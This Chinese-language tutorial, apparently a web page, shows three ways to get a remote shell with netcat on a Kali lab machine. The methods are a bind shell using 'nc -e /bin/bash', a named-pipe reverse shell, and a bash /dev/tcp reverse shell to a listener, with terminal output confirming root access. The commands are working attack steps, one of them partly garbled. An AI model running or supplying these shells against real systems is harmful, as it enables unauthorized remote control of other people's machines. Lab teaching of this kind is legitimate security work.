您好,登錄后才能下訂單哦!
nc幫助文檔上面說的是TCP/IP協議中的swiss army knife,是一個使用tcp或udp協議通過網絡連接來讀寫數據的一個簡單的多功能的工具!在***中經常用于反彈shell,用于交互式執行shell,或者用于提權!
基本使用語法:
nc 選項 IP port
基本參數說明:
-l:監聽端口,監聽入站信息 -p:后跟本地端口號 -v:顯示端口的信息,多數人喜歡使用-vv,但是我用了沒看到有什么區別
第一種方法:
第一種的話需要目標主機直接就是外網獨立ip才可以,如果是通過內網映射出來的,就不適用這個方法了!
目標主機:
nc -lvp 2222 -e /bin/bash
root@kali:~# nc -lvp 2222 -e /bin/bash listening on [any] 2222 ...
***主機:
nc 目標機IP 2222
F:\\eth20-CTF-Toolkits\\CTF工具包\\連接工具>nc 192.168.5.128 2222
此時我們查看目標主機:
root@kali:~# nc -lvp 2222 -e /bin/bash listening on [any] 2222 ... 192.168.5.1: inverse host lookup failed: Unknown host connect to [192.168.5.128] from (UNKNOWN) [192.168.5.1] 14960
此時我們在***機就可以執行命令了!
F:\\eth20-CTF-Toolkits\\CTF工具包\\連接工具>nc 192.168.5.128 2222 whoami root uname -a Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
第二種方法:
第二種方法,需要我們有獨立外網ip,用于監聽返回來的shell!
目標主機:
root@kali:~# mknod /tmp/backpipe p root@kali:~# /bin/sh 0/tmp/backpipe
***主機:
F:\\eth20-CTF-Toolkits\\CTF工具包\\連接工具>nc -lvp 2222 lstn on [any] 2222 .. 192.168.5.128: reverse hst chk phailed: h_errno 11004: NO_DATA connect to [192.168.5.1] from (UNKNOWN) [192.168.5.128] 53404: NO_DATA whoami root uname -a Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
第三種:
第三種方法需要我們有獨立的外網ip,用于接收shell!
目標主機:
root@kali:~# bash -i >& /dev/tcp/192.168.5.1/2222 0>&1
***主機:
F:\\eth20-CTF-Toolkits\\CTF工具包\\連接工具>nc -lvp 2222 lstn on [any] 2222 .. 192.168.5.128: reverse hst chk phailed: h_errno 11004: NO_DATA connect to [192.168.5.1] from (UNKNOWN) [192.168.5.128] 53418: NO_DATA root@kali:~# uname -a uname -a Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux root@kali:~# whoami whoami root root@kali:~#exit
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。